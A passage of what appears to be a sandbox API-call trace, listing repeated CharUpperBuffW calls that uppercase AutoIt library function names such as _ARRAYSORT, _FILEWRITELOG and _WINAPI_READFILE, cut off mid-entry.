lpsz="__ARRAYDISPLAY_GETHEADER", cchLength=0x18 | out: lpsz="__ARRAYDISPLAY_GETHEADER") returned 0x18 [0070.539] CharUpperBuffW (in: lpsz="__ARRAYDISPLAY_GETITEM", cchLength=0x16 | out: lpsz="__ARRAYDISPLAY_GETITEM") returned 0x16 [0070.539] CharUpperBuffW (in: lpsz="__ARRAYDISPLAY_GETITEM", cchLength=0x16 | out: lpsz="__ARRAYDISPLAY_GETITEM") returned 0x16 [0070.539] CharUpperBuffW (in: lpsz="__ARRAYDISPLAY_GETITEMCOUNT", cchLength=0x1b | out: lpsz="__ARRAYDISPLAY_GETITEMCOUNT") returned 0x1b [0070.539] CharUpperBuffW (in: lpsz="__ARRAYDISPLAY_GETITEMCOUNT", cchLength=0x1b | out: lpsz="__ARRAYDISPLAY_GETITEMCOUNT") returned 0x1b [0070.539] CharUpperBuffW (in: lpsz="__ARRAYDISPLAY_GETITEMFORMAT", cchLength=0x1c | out: lpsz="__ARRAYDISPLAY_GETITEMFORMAT") returned 0x1c [0070.540] CharUpperBuffW (in: lpsz="__ARRAYDISPLAY_GETITEMFORMAT", cchLength=0x1c | out: lpsz="__ARRAYDISPLAY_GETITEMFORMAT") returned 0x1c [0070.540] CharUpperBuffW (in: lpsz="__ARRAYDISPLAY_GETITEMTEXT", cchLength=0x1a | out: lpsz="__ARRAYDISPLAY_GETITEMTEXT") returned 0x1a [0070.540] CharUpperBuffW (in: lpsz="__ARRAYDISPLAY_GETITEMTEXT", cchLength=0x1a | out: lpsz="__ARRAYDISPLAY_GETITEMTEXT") returned 0x1a [0070.540] CharUpperBuffW (in: lpsz="__ARRAYDISPLAY_GETITEMTEXTSTRING", cchLength=0x20 | out: lpsz="__ARRAYDISPLAY_GETITEMTEXTSTRING") returned 0x20 [0070.540] CharUpperBuffW (in: lpsz="__ARRAYDISPLAY_GETITEMTEXTSTRING", cchLength=0x20 | out: lpsz="__ARRAYDISPLAY_GETITEMTEXTSTRING") returned 0x20 [0070.540] CharUpperBuffW (in: lpsz="__ARRAYDISPLAY_JUSTIFYCOLUMN", cchLength=0x1c | out: lpsz="__ARRAYDISPLAY_JUSTIFYCOLUMN") returned 0x1c [0070.540] CharUpperBuffW (in: lpsz="__ARRAYDISPLAY_JUSTIFYCOLUMN", cchLength=0x1c | out: lpsz="__ARRAYDISPLAY_JUSTIFYCOLUMN") returned 0x1c [0070.540] CharUpperBuffW (in: lpsz="__ARRAYDISPLAY_SETITEMFORMAT", cchLength=0x1c | out: lpsz="__ARRAYDISPLAY_SETITEMFORMAT") returned 0x1c [0070.540] CharUpperBuffW (in: lpsz="__ARRAYDISPLAY_SETITEMFORMAT", cchLength=0x1c | out: lpsz="__ARRAYDISPLAY_SETITEMFORMAT") returned 0x1c [0070.540] CharUpperBuffW (in: lpsz="_ARRAYADD", cchLength=0x9 | out: lpsz="_ARRAYADD") returned 0x9 [0070.540] CharUpperBuffW (in: lpsz="_ARRAYADD", cchLength=0x9 | out: lpsz="_ARRAYADD") returned 0x9 [0070.540] CharUpperBuffW (in: lpsz="_ARRAYBINARYSEARCH", cchLength=0x12 | out: lpsz="_ARRAYBINARYSEARCH") returned 0x12 [0070.540] CharUpperBuffW (in: lpsz="_ARRAYBINARYSEARCH", cchLength=0x12 | out: lpsz="_ARRAYBINARYSEARCH") returned 0x12 [0070.540] CharUpperBuffW (in: lpsz="_ARRAYCOLDELETE", cchLength=0xf | out: lpsz="_ARRAYCOLDELETE") returned 0xf [0070.540] CharUpperBuffW (in: lpsz="_ARRAYCOLDELETE", cchLength=0xf | out: lpsz="_ARRAYCOLDELETE") returned 0xf [0070.540] CharUpperBuffW (in: lpsz="_ARRAYCOLINSERT", cchLength=0xf | out: lpsz="_ARRAYCOLINSERT") returned 0xf [0070.540] CharUpperBuffW (in: lpsz="_ARRAYCOLINSERT", cchLength=0xf | out: lpsz="_ARRAYCOLINSERT") returned 0xf [0070.541] CharUpperBuffW (in: lpsz="_ARRAYCOMBINATIONS", cchLength=0x12 | out: lpsz="_ARRAYCOMBINATIONS") returned 0x12 [0070.541] CharUpperBuffW (in: lpsz="_ARRAYCOMBINATIONS", cchLength=0x12 | out: lpsz="_ARRAYCOMBINATIONS") returned 0x12 [0070.541] CharUpperBuffW (in: lpsz="_ARRAYCONCATENATE", cchLength=0x11 | out: lpsz="_ARRAYCONCATENATE") returned 0x11 [0070.541] CharUpperBuffW (in: lpsz="_ARRAYCONCATENATE", cchLength=0x11 | out: lpsz="_ARRAYCONCATENATE") returned 0x11 [0070.541] CharUpperBuffW (in: lpsz="_ARRAYDELETE", cchLength=0xc | out: lpsz="_ARRAYDELETE") returned 0xc [0070.541] CharUpperBuffW (in: lpsz="_ARRAYDELETE", cchLength=0xc | out: lpsz="_ARRAYDELETE") returned 0xc [0070.541] CharUpperBuffW (in: lpsz="_ARRAYDISPLAY", cchLength=0xd | out: lpsz="_ARRAYDISPLAY") returned 0xd [0070.541] CharUpperBuffW (in: lpsz="_ARRAYDISPLAY", cchLength=0xd | out: lpsz="_ARRAYDISPLAY") returned 0xd [0070.541] CharUpperBuffW (in: lpsz="_ARRAYEXTRACT", cchLength=0xd | out: lpsz="_ARRAYEXTRACT") returned 0xd [0070.541] CharUpperBuffW (in: lpsz="_ARRAYEXTRACT", cchLength=0xd | out: lpsz="_ARRAYEXTRACT") returned 0xd [0070.541] CharUpperBuffW (in: lpsz="_ARRAYFINDALL", cchLength=0xd | out: lpsz="_ARRAYFINDALL") returned 0xd [0070.541] CharUpperBuffW (in: lpsz="_ARRAYFINDALL", cchLength=0xd | out: lpsz="_ARRAYFINDALL") returned 0xd [0070.541] CharUpperBuffW (in: lpsz="_ARRAYINSERT", cchLength=0xc | out: lpsz="_ARRAYINSERT") returned 0xc [0070.541] CharUpperBuffW (in: lpsz="_ARRAYINSERT", cchLength=0xc | out: lpsz="_ARRAYINSERT") returned 0xc [0070.541] CharUpperBuffW (in: lpsz="_ARRAYMAX", cchLength=0x9 | out: lpsz="_ARRAYMAX") returned 0x9 [0070.541] CharUpperBuffW (in: lpsz="_ARRAYMAX", cchLength=0x9 | out: lpsz="_ARRAYMAX") returned 0x9 [0070.541] CharUpperBuffW (in: lpsz="_ARRAYMAXINDEX", cchLength=0xe | out: lpsz="_ARRAYMAXINDEX") returned 0xe [0070.542] CharUpperBuffW (in: lpsz="_ARRAYMAXINDEX", cchLength=0xe | out: lpsz="_ARRAYMAXINDEX") returned 0xe [0070.542] CharUpperBuffW (in: lpsz="_ARRAYMIN", cchLength=0x9 | out: lpsz="_ARRAYMIN") returned 0x9 [0070.542] CharUpperBuffW (in: lpsz="_ARRAYMIN", cchLength=0x9 | out: lpsz="_ARRAYMIN") returned 0x9 [0070.542] CharUpperBuffW (in: lpsz="_ARRAYMININDEX", cchLength=0xe | out: lpsz="_ARRAYMININDEX") returned 0xe [0070.542] CharUpperBuffW (in: lpsz="_ARRAYMININDEX", cchLength=0xe | out: lpsz="_ARRAYMININDEX") returned 0xe [0070.542] CharUpperBuffW (in: lpsz="_ARRAYPERMUTE", cchLength=0xd | out: lpsz="_ARRAYPERMUTE") returned 0xd [0070.542] CharUpperBuffW (in: lpsz="_ARRAYPERMUTE", cchLength=0xd | out: lpsz="_ARRAYPERMUTE") returned 0xd [0070.542] CharUpperBuffW (in: lpsz="_ARRAYPOP", cchLength=0x9 | out: lpsz="_ARRAYPOP") returned 0x9 [0070.542] CharUpperBuffW (in: lpsz="_ARRAYPOP", cchLength=0x9 | out: lpsz="_ARRAYPOP") returned 0x9 [0070.542] CharUpperBuffW (in: lpsz="_ARRAYPUSH", cchLength=0xa | out: lpsz="_ARRAYPUSH") returned 0xa [0070.542] CharUpperBuffW (in: lpsz="_ARRAYPUSH", cchLength=0xa | out: lpsz="_ARRAYPUSH") returned 0xa [0070.542] CharUpperBuffW (in: lpsz="_ARRAYREVERSE", cchLength=0xd | out: lpsz="_ARRAYREVERSE") returned 0xd [0070.542] CharUpperBuffW (in: lpsz="_ARRAYREVERSE", cchLength=0xd | out: lpsz="_ARRAYREVERSE") returned 0xd [0070.542] CharUpperBuffW (in: lpsz="_ARRAYSEARCH", cchLength=0xc | out: lpsz="_ARRAYSEARCH") returned 0xc [0070.542] CharUpperBuffW (in: lpsz="_ARRAYSEARCH", cchLength=0xc | out: lpsz="_ARRAYSEARCH") returned 0xc [0070.542] CharUpperBuffW (in: lpsz="_ARRAYSHUFFLE", cchLength=0xd | out: lpsz="_ARRAYSHUFFLE") returned 0xd [0070.542] CharUpperBuffW (in: lpsz="_ARRAYSHUFFLE", cchLength=0xd | out: lpsz="_ARRAYSHUFFLE") returned 0xd [0070.543] CharUpperBuffW (in: lpsz="_ARRAYSORT", cchLength=0xa | out: lpsz="_ARRAYSORT") returned 0xa [0070.543] CharUpperBuffW (in: lpsz="_ARRAYSORT", cchLength=0xa | out: lpsz="_ARRAYSORT") returned 0xa [0070.543] CharUpperBuffW (in: lpsz="__ARRAYQUICKSORT1D", cchLength=0x12 | out: lpsz="__ARRAYQUICKSORT1D") returned 0x12 [0070.543] CharUpperBuffW (in: lpsz="__ARRAYQUICKSORT1D", cchLength=0x12 | out: lpsz="__ARRAYQUICKSORT1D") returned 0x12 [0070.543] CharUpperBuffW (in: lpsz="__ARRAYQUICKSORT2D", cchLength=0x12 | out: lpsz="__ARRAYQUICKSORT2D") returned 0x12 [0070.543] CharUpperBuffW (in: lpsz="__ARRAYQUICKSORT2D", cchLength=0x12 | out: lpsz="__ARRAYQUICKSORT2D") returned 0x12 [0070.543] CharUpperBuffW (in: lpsz="__ARRAYDUALPIVOTSORT", cchLength=0x14 | out: lpsz="__ARRAYDUALPIVOTSORT") returned 0x14 [0070.543] CharUpperBuffW (in: lpsz="__ARRAYDUALPIVOTSORT", cchLength=0x14 | out: lpsz="__ARRAYDUALPIVOTSORT") returned 0x14 [0070.543] CharUpperBuffW (in: lpsz="_ARRAYSWAP", cchLength=0xa | out: lpsz="_ARRAYSWAP") returned 0xa [0070.543] CharUpperBuffW (in: lpsz="_ARRAYSWAP", cchLength=0xa | out: lpsz="_ARRAYSWAP") returned 0xa [0070.543] CharUpperBuffW (in: lpsz="_ARRAYTOCLIP", cchLength=0xc | out: lpsz="_ARRAYTOCLIP") returned 0xc [0070.543] CharUpperBuffW (in: lpsz="_ARRAYTOCLIP", cchLength=0xc | out: lpsz="_ARRAYTOCLIP") returned 0xc [0070.543] CharUpperBuffW (in: lpsz="_ARRAYTOSTRING", cchLength=0xe | out: lpsz="_ARRAYTOSTRING") returned 0xe [0070.543] CharUpperBuffW (in: lpsz="_ARRAYTOSTRING", cchLength=0xe | out: lpsz="_ARRAYTOSTRING") returned 0xe [0070.543] CharUpperBuffW (in: lpsz="_ARRAYTRANSPOSE", cchLength=0xf | out: lpsz="_ARRAYTRANSPOSE") returned 0xf [0070.543] CharUpperBuffW (in: lpsz="_ARRAYTRANSPOSE", cchLength=0xf | out: lpsz="_ARRAYTRANSPOSE") returned 0xf [0070.543] CharUpperBuffW (in: lpsz="_ARRAYTRIM", cchLength=0xa | out: lpsz="_ARRAYTRIM") returned 0xa [0070.544] CharUpperBuffW (in: lpsz="_ARRAYTRIM", cchLength=0xa | out: lpsz="_ARRAYTRIM") returned 0xa [0070.544] CharUpperBuffW (in: lpsz="_ARRAYUNIQUE", cchLength=0xc | out: lpsz="_ARRAYUNIQUE") returned 0xc [0070.544] CharUpperBuffW (in: lpsz="_ARRAYUNIQUE", cchLength=0xc | out: lpsz="_ARRAYUNIQUE") returned 0xc [0070.544] CharUpperBuffW (in: lpsz="_ARRAY1DTOHISTOGRAM", cchLength=0x13 | out: lpsz="_ARRAY1DTOHISTOGRAM") returned 0x13 [0070.544] CharUpperBuffW (in: lpsz="_ARRAY1DTOHISTOGRAM", cchLength=0x13 | out: lpsz="_ARRAY1DTOHISTOGRAM") returned 0x13 [0070.544] CharUpperBuffW (in: lpsz="__ARRAY_STRINGREPEAT", cchLength=0x14 | out: lpsz="__ARRAY_STRINGREPEAT") returned 0x14 [0070.544] CharUpperBuffW (in: lpsz="__ARRAY_STRINGREPEAT", cchLength=0x14 | out: lpsz="__ARRAY_STRINGREPEAT") returned 0x14 [0070.544] CharUpperBuffW (in: lpsz="__ARRAY_EXETERINTERNAL", cchLength=0x16 | out: lpsz="__ARRAY_EXETERINTERNAL") returned 0x16 [0070.544] CharUpperBuffW (in: lpsz="__ARRAY_EXETERINTERNAL", cchLength=0x16 | out: lpsz="__ARRAY_EXETERINTERNAL") returned 0x16 [0070.544] CharUpperBuffW (in: lpsz="__ARRAY_COMBINATIONS", cchLength=0x14 | out: lpsz="__ARRAY_COMBINATIONS") returned 0x14 [0070.544] CharUpperBuffW (in: lpsz="__ARRAY_COMBINATIONS", cchLength=0x14 | out: lpsz="__ARRAY_COMBINATIONS") returned 0x14 [0070.544] CharUpperBuffW (in: lpsz="__ARRAY_GETNEXT", cchLength=0xf | out: lpsz="__ARRAY_GETNEXT") returned 0xf [0070.544] CharUpperBuffW (in: lpsz="__ARRAY_GETNEXT", cchLength=0xf | out: lpsz="__ARRAY_GETNEXT") returned 0xf [0070.544] CharUpperBuffW (in: lpsz="__ARRAY_MINMAXINDEX", cchLength=0x13 | out: lpsz="__ARRAY_MINMAXINDEX") returned 0x13 [0070.544] CharUpperBuffW (in: lpsz="__ARRAY_MINMAXINDEX", cchLength=0x13 | out: lpsz="__ARRAY_MINMAXINDEX") returned 0x13 [0070.544] CharUpperBuffW (in: lpsz="__ARRAY_GREATERTHAN", cchLength=0x13 | out: lpsz="__ARRAY_GREATERTHAN") returned 0x13 [0070.544] CharUpperBuffW (in: lpsz="__ARRAY_GREATERTHAN", cchLength=0x13 | out: lpsz="__ARRAY_GREATERTHAN") returned 0x13 [0070.545] CharUpperBuffW (in: lpsz="__ARRAY_LESSTHAN", cchLength=0x10 | out: lpsz="__ARRAY_LESSTHAN") returned 0x10 [0070.545] CharUpperBuffW (in: lpsz="__ARRAY_LESSTHAN", cchLength=0x10 | out: lpsz="__ARRAY_LESSTHAN") returned 0x10 [0070.545] CharUpperBuffW (in: lpsz="__ARRAYUNIQUE_AUTOERRFUNC", cchLength=0x19 | out: lpsz="__ARRAYUNIQUE_AUTOERRFUNC") returned 0x19 [0070.545] CharUpperBuffW (in: lpsz="__ARRAYUNIQUE_AUTOERRFUNC", cchLength=0x19 | out: lpsz="__ARRAYUNIQUE_AUTOERRFUNC") returned 0x19 [0070.545] CharUpperBuffW (in: lpsz="_FILECOUNTLINES", cchLength=0xf | out: lpsz="_FILECOUNTLINES") returned 0xf [0070.545] CharUpperBuffW (in: lpsz="_FILECOUNTLINES", cchLength=0xf | out: lpsz="_FILECOUNTLINES") returned 0xf [0070.545] CharUpperBuffW (in: lpsz="_FILECREATE", cchLength=0xb | out: lpsz="_FILECREATE") returned 0xb [0070.545] CharUpperBuffW (in: lpsz="_FILECREATE", cchLength=0xb | out: lpsz="_FILECREATE") returned 0xb [0070.545] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0070.546] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0070.546] CharUpperBuffW (in: lpsz="_FILELISTTOARRAYREC", cchLength=0x13 | out: lpsz="_FILELISTTOARRAYREC") returned 0x13 [0070.546] CharUpperBuffW (in: lpsz="_FILELISTTOARRAYREC", cchLength=0x13 | out: lpsz="_FILELISTTOARRAYREC") returned 0x13 [0070.546] CharUpperBuffW (in: lpsz="__FLTAR_ADDFILELISTS", cchLength=0x14 | out: lpsz="__FLTAR_ADDFILELISTS") returned 0x14 [0070.546] CharUpperBuffW (in: lpsz="__FLTAR_ADDFILELISTS", cchLength=0x14 | out: lpsz="__FLTAR_ADDFILELISTS") returned 0x14 [0070.546] CharUpperBuffW (in: lpsz="__FLTAR_ADDTOLIST", cchLength=0x11 | out: lpsz="__FLTAR_ADDTOLIST") returned 0x11 [0070.546] CharUpperBuffW (in: lpsz="__FLTAR_ADDTOLIST", cchLength=0x11 | out: lpsz="__FLTAR_ADDTOLIST") returned 0x11 [0070.546] CharUpperBuffW (in: lpsz="__FLTAR_LISTTOMASK", cchLength=0x12 | out: lpsz="__FLTAR_LISTTOMASK") returned 0x12 [0070.546] CharUpperBuffW (in: lpsz="__FLTAR_LISTTOMASK", cchLength=0x12 | out: lpsz="__FLTAR_LISTTOMASK") returned 0x12 [0070.546] CharUpperBuffW (in: lpsz="_FILEPRINT", cchLength=0xa | out: lpsz="_FILEPRINT") returned 0xa [0070.546] CharUpperBuffW (in: lpsz="_FILEPRINT", cchLength=0xa | out: lpsz="_FILEPRINT") returned 0xa [0070.546] CharUpperBuffW (in: lpsz="_FILEREADTOARRAY", cchLength=0x10 | out: lpsz="_FILEREADTOARRAY") returned 0x10 [0070.546] CharUpperBuffW (in: lpsz="_FILEREADTOARRAY", cchLength=0x10 | out: lpsz="_FILEREADTOARRAY") returned 0x10 [0070.546] CharUpperBuffW (in: lpsz="_FILEWRITEFROMARRAY", cchLength=0x13 | out: lpsz="_FILEWRITEFROMARRAY") returned 0x13 [0070.546] CharUpperBuffW (in: lpsz="_FILEWRITEFROMARRAY", cchLength=0x13 | out: lpsz="_FILEWRITEFROMARRAY") returned 0x13 [0070.546] CharUpperBuffW (in: lpsz="_FILEWRITELOG", cchLength=0xd | out: lpsz="_FILEWRITELOG") returned 0xd [0070.546] CharUpperBuffW (in: lpsz="_FILEWRITELOG", cchLength=0xd | out: lpsz="_FILEWRITELOG") returned 0xd [0070.547] CharUpperBuffW (in: lpsz="_FILEWRITETOLINE", cchLength=0x10 | out: lpsz="_FILEWRITETOLINE") returned 0x10 [0070.547] CharUpperBuffW (in: lpsz="_FILEWRITETOLINE", cchLength=0x10 | out: lpsz="_FILEWRITETOLINE") returned 0x10 [0070.547] CharUpperBuffW (in: lpsz="_PATHFULL", cchLength=0x9 | out: lpsz="_PATHFULL") returned 0x9 [0070.547] CharUpperBuffW (in: lpsz="_PATHFULL", cchLength=0x9 | out: lpsz="_PATHFULL") returned 0x9 [0070.547] CharUpperBuffW (in: lpsz="_PATHGETRELATIVE", cchLength=0x10 | out: lpsz="_PATHGETRELATIVE") returned 0x10 [0070.547] CharUpperBuffW (in: lpsz="_PATHGETRELATIVE", cchLength=0x10 | out: lpsz="_PATHGETRELATIVE") returned 0x10 [0070.547] CharUpperBuffW (in: lpsz="_PATHMAKE", cchLength=0x9 | out: lpsz="_PATHMAKE") returned 0x9 [0070.547] CharUpperBuffW (in: lpsz="_PATHMAKE", cchLength=0x9 | out: lpsz="_PATHMAKE") returned 0x9 [0070.547] CharUpperBuffW (in: lpsz="_PATHSPLIT", cchLength=0xa | out: lpsz="_PATHSPLIT") returned 0xa [0070.547] CharUpperBuffW (in: lpsz="_PATHSPLIT", cchLength=0xa | out: lpsz="_PATHSPLIT") returned 0xa [0070.547] CharUpperBuffW (in: lpsz="_REPLACESTRINGINFILE", cchLength=0x14 | out: lpsz="_REPLACESTRINGINFILE") returned 0x14 [0070.547] CharUpperBuffW (in: lpsz="_REPLACESTRINGINFILE", cchLength=0x14 | out: lpsz="_REPLACESTRINGINFILE") returned 0x14 [0070.547] CharUpperBuffW (in: lpsz="_TEMPFILE", cchLength=0x9 | out: lpsz="_TEMPFILE") returned 0x9 [0070.547] CharUpperBuffW (in: lpsz="_TEMPFILE", cchLength=0x9 | out: lpsz="_TEMPFILE") returned 0x9 [0070.547] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0070.547] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0070.548] CharUpperBuffW (in: lpsz="_WINAPI_FREELIBRARY", cchLength=0x13 | out: lpsz="_WINAPI_FREELIBRARY") returned 0x13 [0070.548] CharUpperBuffW (in: lpsz="_WINAPI_FREELIBRARY", cchLength=0x13 | out: lpsz="_WINAPI_FREELIBRARY") returned 0x13 [0070.548] CharUpperBuffW (in: lpsz="_WINAPI_GETCURSORINFO", cchLength=0x15 | out: lpsz="_WINAPI_GETCURSORINFO") returned 0x15 [0070.548] CharUpperBuffW (in: lpsz="_WINAPI_GETCURSORINFO", cchLength=0x15 | out: lpsz="_WINAPI_GETCURSORINFO") returned 0x15 [0070.548] CharUpperBuffW (in: lpsz="_WINAPI_GETDLGCTRLID", cchLength=0x14 | out: lpsz="_WINAPI_GETDLGCTRLID") returned 0x14 [0070.548] CharUpperBuffW (in: lpsz="_WINAPI_GETDLGCTRLID", cchLength=0x14 | out: lpsz="_WINAPI_GETDLGCTRLID") returned 0x14 [0070.548] CharUpperBuffW (in: lpsz="_WINAPI_GETMODULEHANDLE", cchLength=0x17 | out: lpsz="_WINAPI_GETMODULEHANDLE") returned 0x17 [0070.548] CharUpperBuffW (in: lpsz="_WINAPI_GETMODULEHANDLE", cchLength=0x17 | out: lpsz="_WINAPI_GETMODULEHANDLE") returned 0x17 [0070.548] CharUpperBuffW (in: lpsz="_WINAPI_GETSTRING", cchLength=0x11 | out: lpsz="_WINAPI_GETSTRING") returned 0x11 [0070.548] CharUpperBuffW (in: lpsz="_WINAPI_GETSTRING", cchLength=0x11 | out: lpsz="_WINAPI_GETSTRING") returned 0x11 [0070.548] CharUpperBuffW (in: lpsz="_WINAPI_ISWOW64PROCESS", cchLength=0x16 | out: lpsz="_WINAPI_ISWOW64PROCESS") returned 0x16 [0070.548] CharUpperBuffW (in: lpsz="_WINAPI_ISWOW64PROCESS", cchLength=0x16 | out: lpsz="_WINAPI_ISWOW64PROCESS") returned 0x16 [0070.548] CharUpperBuffW (in: lpsz="_WINAPI_LOADIMAGE", cchLength=0x11 | out: lpsz="_WINAPI_LOADIMAGE") returned 0x11 [0070.548] CharUpperBuffW (in: lpsz="_WINAPI_LOADIMAGE", cchLength=0x11 | out: lpsz="_WINAPI_LOADIMAGE") returned 0x11 [0070.548] CharUpperBuffW (in: lpsz="_WINAPI_LOADLIBRARY", cchLength=0x13 | out: lpsz="_WINAPI_LOADLIBRARY") returned 0x13 [0070.548] CharUpperBuffW (in: lpsz="_WINAPI_LOADLIBRARY", cchLength=0x13 | out: lpsz="_WINAPI_LOADLIBRARY") returned 0x13 [0070.548] CharUpperBuffW (in: lpsz="_WINAPI_PATHISDIRECTORY", cchLength=0x17 | out: lpsz="_WINAPI_PATHISDIRECTORY") returned 0x17 [0070.549] CharUpperBuffW (in: lpsz="_WINAPI_PATHISDIRECTORY", cchLength=0x17 | out: lpsz="_WINAPI_PATHISDIRECTORY") returned 0x17 [0070.549] CharUpperBuffW (in: lpsz="_WINAPI_READFILE", cchLength=0x10 | out: lpsz="_WINAPI_READFILE") returned 0x10 [0070.549] CharUpperBuffW (in: lpsz="_WINAPI_READFILE", cchLength=0x10 | out: lpsz="_WINAPI_READFILE") returned 0x10 [0070.549] CharUpperBuffW (in: lpsz="_WINAPI_STRLEN", cchLength=0xe | out: lpsz="_WINAPI_STRLEN") returned 0xe [0070.549] CharUpperBuffW (in: lpsz="_WINAPI_STRLEN", cchLength=0xe | out: lpsz="_WINAPI_STRLEN") returned 0xe [0070.549] CharUpperBuffW (in: lpsz="_WINAPI_SWITCHCOLOR", cchLength=0x13 | out: lpsz="_WINAPI_SWITCHCOLOR") returned 0x13 [0070.549] CharUpperBuffW (in: lpsz="_WINAPI_SWITCHCOLOR", cchLength=0x13 | out: lpsz="_WINAPI_SWITCHCOLOR") returned 0x13 [0070.549] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0070.549] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0070.549] CharUpperBuffW (in: lpsz="__CHECKERRORARRAYBOUNDS", cchLength=0x17 | out: lpsz="__CHECKERRORARRAYBOUNDS") returned 0x17 [0070.549] CharUpperBuffW (in: lpsz="__CHECKERRORARRAYBOUNDS", cchLength=0x17 | out: lpsz="__CHECKERRORARRAYBOUNDS") returned 0x17 [0070.549] CharUpperBuffW (in: lpsz="__CHECKERRORCLOSEHANDLE", cchLength=0x17 | out: lpsz="__CHECKERRORCLOSEHANDLE") returned 0x17 [0070.549] CharUpperBuffW (in: lpsz="__CHECKERRORCLOSEHANDLE", cchLength=0x17 | out: lpsz="__CHECKERRORCLOSEHANDLE") returned 0x17 [0070.549] CharUpperBuffW (in: lpsz="__DLL", cchLength=0x5 | out: lpsz="__DLL") returned 0x5 [0070.549] CharUpperBuffW (in: lpsz="__DLL", cchLength=0x5 | out: lpsz="__DLL") returned 0x5 [0070.549] CharUpperBuffW (in: lpsz="__ENUMWINDOWSPROC", cchLength=0x11 | out: lpsz="__ENUMWINDOWSPROC") returned 0x11 [0070.550] CharUpperBuffW (in: lpsz="__ENUMWINDOWSPROC", cchLength=0x11 | out: lpsz="__ENUMWINDOWSPROC") returned 0x11 [0070.550] CharUpperBuffW (in: lpsz="__FATALEXIT", cchLength=0xb | out: lpsz="__FATALEXIT") returned 0xb [0070.550] CharUpperBuffW (in: lpsz="__FATALEXIT", cchLength=0xb | out: lpsz="__FATALEXIT") returned 0xb [0070.550] CharUpperBuffW (in: lpsz="__INC", cchLength=0x5 | out: lpsz="__INC") returned 0x5 [0070.550] CharUpperBuffW (in: lpsz="__INC", cchLength=0x5 | out: lpsz="__INC") returned 0x5 [0070.550] CharUpperBuffW (in: lpsz="__RGB", cchLength=0x5 | out: lpsz="__RGB") returned 0x5 [0070.550] CharUpperBuffW (in: lpsz="__RGB", cchLength=0x5 | out: lpsz="__RGB") returned 0x5 [0070.550] CharUpperBuffW (in: lpsz="__WINVER", cchLength=0x8 | out: lpsz="__WINVER") returned 0x8 [0070.550] CharUpperBuffW (in: lpsz="__WINVER", cchLength=0x8 | out: lpsz="__WINVER") returned 0x8 [0070.550] CharUpperBuffW (in: lpsz="_WINAPI_CLSIDFROMPROGID", cchLength=0x17 | out: lpsz="_WINAPI_CLSIDFROMPROGID") returned 0x17 [0070.550] CharUpperBuffW (in: lpsz="_WINAPI_CLSIDFROMPROGID", cchLength=0x17 | out: lpsz="_WINAPI_CLSIDFROMPROGID") returned 0x17 [0070.550] CharUpperBuffW (in: lpsz="_WINAPI_COINITIALIZE", cchLength=0x14 | out: lpsz="_WINAPI_COINITIALIZE") returned 0x14 [0070.550] CharUpperBuffW (in: lpsz="_WINAPI_COINITIALIZE", cchLength=0x14 | out: lpsz="_WINAPI_COINITIALIZE") returned 0x14 [0070.550] CharUpperBuffW (in: lpsz="_WINAPI_COTASKMEMALLOC", cchLength=0x16 | out: lpsz="_WINAPI_COTASKMEMALLOC") returned 0x16 [0070.550] CharUpperBuffW (in: lpsz="_WINAPI_COTASKMEMALLOC", cchLength=0x16 | out: lpsz="_WINAPI_COTASKMEMALLOC") returned 0x16 [0070.550] CharUpperBuffW (in: lpsz="_WINAPI_COTASKMEMFREE", cchLength=0x15 | out: lpsz="_WINAPI_COTASKMEMFREE") returned 0x15 [0070.550] CharUpperBuffW (in: lpsz="_WINAPI_COTASKMEMFREE", cchLength=0x15 | out: lpsz="_WINAPI_COTASKMEMFREE") returned 0x15 [0070.551] CharUpperBuffW (in: lpsz="_WINAPI_COTASKMEMREALLOC", cchLength=0x18 | out: lpsz="_WINAPI_COTASKMEMREALLOC") returned 0x18 [0070.551] CharUpperBuffW (in: lpsz="_WINAPI_COTASKMEMREALLOC", cchLength=0x18 | out: lpsz="_WINAPI_COTASKMEMREALLOC") returned 0x18 [0070.551] CharUpperBuffW (in: lpsz="_WINAPI_COUNINITIALIZE", cchLength=0x16 | out: lpsz="_WINAPI_COUNINITIALIZE") returned 0x16 [0070.551] CharUpperBuffW (in: lpsz="_WINAPI_COUNINITIALIZE", cchLength=0x16 | out: lpsz="_WINAPI_COUNINITIALIZE") returned 0x16 [0070.551] CharUpperBuffW (in: lpsz="_WINAPI_CREATEGUID", cchLength=0x12 | out: lpsz="_WINAPI_CREATEGUID") returned 0x12 [0070.551] CharUpperBuffW (in: lpsz="_WINAPI_CREATEGUID", cchLength=0x12 | out: lpsz="_WINAPI_CREATEGUID") returned 0x12 [0070.551] CharUpperBuffW (in: lpsz="_WINAPI_CREATESTREAMONHGLOBAL", cchLength=0x1d | out: lpsz="_WINAPI_CREATESTREAMONHGLOBAL") returned 0x1d [0070.551] CharUpperBuffW (in: lpsz="_WINAPI_CREATESTREAMONHGLOBAL", cchLength=0x1d | out: lpsz="_WINAPI_CREATESTREAMONHGLOBAL") returned 0x1d [0070.551] CharUpperBuffW (in: lpsz="_WINAPI_GETHGLOBALFROMSTREAM", cchLength=0x1c | out: lpsz="_WINAPI_GETHGLOBALFROMSTREAM") returned 0x1c [0070.551] CharUpperBuffW (in: lpsz="_WINAPI_GETHGLOBALFROMSTREAM", cchLength=0x1c | out: lpsz="_WINAPI_GETHGLOBALFROMSTREAM") returned 0x1c [0070.551] CharUpperBuffW (in: lpsz="_WINAPI_PROGIDFROMCLSID", cchLength=0x17 | out: lpsz="_WINAPI_PROGIDFROMCLSID") returned 0x17 [0070.551] CharUpperBuffW (in: lpsz="_WINAPI_PROGIDFROMCLSID", cchLength=0x17 | out: lpsz="_WINAPI_PROGIDFROMCLSID") returned 0x17 [0070.551] CharUpperBuffW (in: lpsz="_WINAPI_RELEASESTREAM", cchLength=0x15 | out: lpsz="_WINAPI_RELEASESTREAM") returned 0x15 [0070.551] CharUpperBuffW (in: lpsz="_WINAPI_RELEASESTREAM", cchLength=0x15 | out: 